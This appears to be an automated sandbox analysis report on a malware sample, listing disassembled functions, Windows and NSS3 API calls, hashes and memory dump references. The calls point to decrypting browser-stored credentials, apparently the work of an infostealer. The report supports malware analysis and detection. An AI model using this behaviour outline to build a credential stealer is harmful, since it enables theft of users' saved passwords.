                                                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,0079D518), ref: 0040CE71
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040C920: lstrcatA.KERNEL32(?,00420B47), ref: 0040CA43
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040C920: lstrcatA.KERNEL32(?,00420B4B), ref: 0040CA57
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040C920: lstrcatA.KERNEL32(?,00420B4E), ref: 0040CA78
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040CF44
                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040CF9C
                                                                                                                                                                                                                                                                                                                                  • NSS_Shutdown.NSS3 ref: 0040CFAA
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Filelstrcat$lstrcpy$K11_lstrlen$PointerSlot$AuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalReadShutdownSizeStringmemcpymemset
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3555573487-3916222277
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3c2780665886da9be6182e870fdf6bec2f6a852fa5ba2959b692be7737f0e377
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4fdc336044367871c69213567fe42fce90f61d04e08d5fff212e48b059342ccf
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3c2780665886da9be6182e870fdf6bec2f6a852fa5ba2959b692be7737f0e377
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2AE13E71D05108ABCB14EBA1DCA6FEEB779AF14304F00419EF10663191EF387A99CB69
                                                                                                                                                                                                                                                                                                                                  Function 00411520 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 308stringCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 00411557
                                                                                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 004119A0
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,0079D738,?,004210F4,?,00000000), ref: 0041AB3B
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: strtok_s$lstrcpylstrlen
                                                                                                                                                                                                                                                                                                                                  • String ID: z$8z$Pz$Xz
                                                                                                                                                                                                                                                                                                                                  • API String ID: 348468850-2896817072
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b65bc705439f5a7188ad40494c59a3aadfc6b0338d530ec84c7c2a393aa2d55f
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 972b35e280e46cb9f8f2efccef7ae82ad5cc4b0fb079cf0b80f28d4141883f35
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b65bc705439f5a7188ad40494c59a3aadfc6b0338d530ec84c7c2a393aa2d55f
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 98C1D1B5A011089BCB14EF60DC99FDA7379AF58308F00449EF509A7282EB34EAD5CF95
                                                                                                                                                                                                                                                                                                                                  Function 6C5E5E60 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 182threadstringtimeCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C5E5E9D
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5F5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C5F56EE,?,00000001), ref: 6C5F5B85
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5F5B50: EnterCriticalSection.KERNEL32(6C65F688,?,?,?,6C5F56EE,?,00000001), ref: 6C5F5B90
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5F5B50: LeaveCriticalSection.KERNEL32(6C65F688,?,?,?,6C5F56EE,?,00000001), ref: 6C5F5BD8
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5F5B50: GetTickCount64.KERNEL32 ref: 6C5F5BE4
                                                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C5E5EAB
                                                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C5E5EB8
                                                                                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C5E5ECF
                                                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(00000000,GeckoMain,00000000), ref: 6C5E6017
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5D4310: moz_xmalloc.MOZGLUE(00000010,?,6C5D42D2), ref: 6C5D436A
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5D4310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6C5D42D2), ref: 6C5D4387
                                                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(00000004), ref: 6C5E5F47
                                                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 6C5E5F53
                                                                                                                                                                                                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 6C5E5F5C
                                                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 6C5E5F66
                                                                                                                                                                                                                                                                                                                                  • DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C5E5F7E
                                                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(00000024), ref: 6C5E5F27
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5ECA10: mozalloc_abort.MOZGLUE(?), ref: 6C5ECAA2
                                                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5E55E1), ref: 6C5E5E8C
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5ECA10: malloc.MOZGLUE(?), ref: 6C5ECA26
                                                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5E55E1), ref: 6C5E605D
                                                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5E55E1), ref: 6C5E60CC
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
                                                                                                                                                                                                                                                                                                                                  • String ID: GeckoMain
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3711609982-966795396
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 985ff353678303f19ffbf9b37be363784f6075c3e5b21aefbea04a605c3ce77a
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3b859f8904aabc9f458b1a903f2ee8b0e1154d49472916a6f1ba0069a839595e
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 985ff353678303f19ffbf9b37be363784f6075c3e5b21aefbea04a605c3ce77a
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C71AFB0604740DFD704DF29C880A6ABBF0FF8A304F94496DE59687B52DB31E948CB96
                                                                                                                                                                                                                                                                                                                                  Function 6C5E9590 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 192libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5D31C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C5D3217
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5D31C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C5D3236
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5D31C0: FreeLibrary.KERNEL32 ref: 6C5D324B
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5D31C0: __Init_thread_footer.LIBCMT ref: 6C5D3260
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5D31C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C5D327F
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5D31C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C5D328E
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5D31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C5D32AB
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5D31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C5D32D1
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5D31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C5D32E5
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5D31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C5D32F7
                                                                                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C5E9675
                                                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C5E9697
                                                                                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C5E96E8
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C5E9707
                                                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C5E971F
                                                                                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C5E9773
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C5E97B7
                                                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32 ref: 6C5E97D0
                                                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32 ref: 6C5E97EB
                                                                                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C5E9824
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
                                                                                                                                                                                                                                                                                                                                  • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3361784254-3880535382
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0bac033aa76c9d3f8a872fdd19b014bdfb2d2ce07b9bb34b4e0a9ebe50db40d0
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 05d34653fbef03fce58023a461009a76c76fee2f688051da220c0397314f96a0
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0bac033aa76c9d3f8a872fdd19b014bdfb2d2ce07b9bb34b4e0a9ebe50db40d0
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D61F171700201AFDF00DF6AECD4B9A7BB4EB8B354FA04529E91597780D730A858CB9A
                                                                                                                                                                                                                                                                                                                                  Function 004119F0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 160stringCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ExitProcessstrtok_s
                                                                                                                                                                                                                                                                                                                                  • String ID: block
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3407564107-2199623458
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7eac02a883670060f85402cb3ab6b1c4d5db302104032426db444f39d4945b97
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 24cedd258c0b2a3a786e48f87e23423129f016670b7ad46fccbec0895e921d59
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7eac02a883670060f85402cb3ab6b1c4d5db302104032426db444f39d4945b97
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 00513174B0A109DFCB04DF94D984FEE77B9AF44704F10405AE502AB261E778EA91CB5A
                                                                                                                                                                                                                                                                                                                                  Function 6C636660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 162threadCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(6C65F618), ref: 6C636694
                                                                                                                                                                                                                                                                                                                                  • GetThreadId.KERNEL32(?), ref: 6C6366B1
                                                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C6366B9
                                                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,00000000,00000100), ref: 6C6366E1
                                                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(6C65F618), ref: 6C636734
                                                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 6C63673A
                                                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(6C65F618), ref: 6C63676C
                                                                                                                                                                                                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 6C6367FC
                                                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,00000000,000002C8), ref: 6C636868
                                                                                                                                                                                                                                                                                                                                  • RtlCaptureContext.NTDLL ref: 6C63687F
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
                                                                                                                                                                                                                                                                                                                                  • String ID: WalkStack64
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2357170935-3499369396
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b95436222902d1939f6ee48191f9e438d8125395b4bf3bd80c81d91906b5dbcd
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5a4afbf9f5d41ee9f595bac782edf140fde5f3fece0a6295c36dde95f4129772
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b95436222902d1939f6ee48191f9e438d8125395b4bf3bd80c81d91906b5dbcd
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC51DF71A09310AFDB11CF25C884B9BBBF4BF89714F54992DF99987640D770E808CB9A
                                                                                                                                                                                                                                                                                                                                  Function 6C61DE60 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 135threadCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C5E4A68), ref: 6C61945E
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C619470
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C619482
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C619420: __Init_thread_footer.LIBCMT ref: 6C61949F
                                                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C61DE73
                                                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C61DF7D
                                                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(6C65F4B8), ref: 6C61DF8A
                                                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C65F4B8), ref: 6C61DFC9
                                                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C61DFF7
                                                                                                                                                                                                                                                                                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C61E000
                                                                                                                                                                                                                                                                                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C5E4A68), ref: 6C61DE7B
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C6194D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6194EE
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C6194D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C619508
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C60CBE8: GetCurrentProcess.KERNEL32(?,6C5D31A7), ref: 6C60CBF1
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C60CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C5D31A7), ref: 6C60CBFA
                                                                                                                                                                                                                                                                                                                                  • ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C5E4A68), ref: 6C61DEB8
                                                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000,?,6C5E4A68), ref: 6C61DEFE
                                                                                                                                                                                                                                                                                                                                  • ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C61DF38
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  • [I %d/%d] locked_profiler_stop, xrefs: 6C61DE83
                                                                                                                                                                                                                                                                                                                                  • [I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6C61E00E
                                                                                                                                                                                                                                                                                                                                  • <none>, xrefs: 6C61DFD7
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
